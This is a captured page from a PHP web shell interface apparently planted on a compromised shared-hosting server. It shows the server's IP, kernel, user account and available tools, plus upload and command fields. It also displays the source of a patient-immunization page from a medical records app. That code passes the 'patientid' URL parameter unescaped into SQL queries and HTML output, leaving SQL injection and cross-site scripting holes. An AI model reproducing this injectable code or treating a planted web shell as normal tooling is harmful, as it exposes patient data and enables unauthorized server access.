Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.220.111.87
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//immuni.php
     <?php
include("dbconnection.php");
include("patient_menu.php");
include("header.php");
?>
    <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
        
<div class="card-body">
                <table id="example2" class="table table-bordered table-hover">
                  <thead>
                  <tr>
                  
    <div class='card-header d-flex p-0'>
                    <ul class='nav nav-pills ml-auto p-2'>
      
              <th><strong>Vaccine </strong></th>
          <th><strong>Date Given </strong></th> 
           <th><strong>Due Date</strong></th>
          <th><strong>Note </strong></th>   
            <th><strong>Action </strong></th>  
        </tr>
                  </thead>
                 
<?php
include("dbconnection.php");
		$sql ="SELECT * FROM immunization WHERE patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                                                                                                                                                                
     <tr>   <td>&nbsp;$rs[Vaccine]</td>     
            <td>&nbsp;$rs[DateGiven]</td>
             <td>&nbsp;$rs[duedate]</td>
            <td>&nbsp;$rs[Note]</td>
				  <td><div class='btn-group'>
	  <button type='button' class='btn btn-default dropdown-toggle' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'>
	    Action <span class='caret'></span>
	  </button>
	  <ul class='dropdown-menu'>
	 <li><a href='edit_immuni.php?Immuni_id=$rs[Immuni_id]'> <i class='glyphicon glyphicon-save'></i> Edit</a></li> 
	      <li><a href='viewimmuni.php?Immuni_id=$rs[Immuni_id]'> <i class='glyphicon glyphicon-save'></i> View</a></li>
	      
	  </ul>
	</div></td>
          </tr>                   
          
          ";
}
?>          </tr>
                  </thead>
                  


                   </tbody>
  <tfoot>
          </tfoot>
        </table>
         <?php
		$sql ="SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
  echo "
             <p align='right'><a  href='addimmuni.php?patientid=$rs[patientid]'>
          <button style='height:40px;width:200px'> Add New Recods</button><span class='caret'></span></p>
          </a>
          
          <br> <br> <br>
          
        
          ";
     
        
        echo "</td></tr>";
      }
     
      ?>
      
              <button onclick="location.href='regularmedicine.php?<?php echo"patientid=$_GET[patientid]";?>'" type="button"> <span style="color:white">    Next Page</span></button>
      </div>
<?php
if(isset($_SESSION[doctorid]))
{
?>  
<hr>
	<table>
		<tr>
			<td>
			<div align="center"><strong><a href="prescription.php?patientid=<?php echo $_GET[patientid]; ?>&appid=<?php echo $rsappointment[appointmentid]; ?>">Add Prescription records</a></strong></div>
			</td>
		</tr>
	</table>
	<script>
  $(function () {
    $("#example1").DataTable({
      "responsive": true,
      "autoWidth": false,
    });
    $('#example2').DataTable({
      "paging": true,
      "lengthChange": false,
      "searching": false,
      "ordering": true,
      "info": true,
      "autoWidth": false,
      "responsive": true,
    });
  });
</script>

<?php
}
?>

Anon7 - 2022
AnonSec Team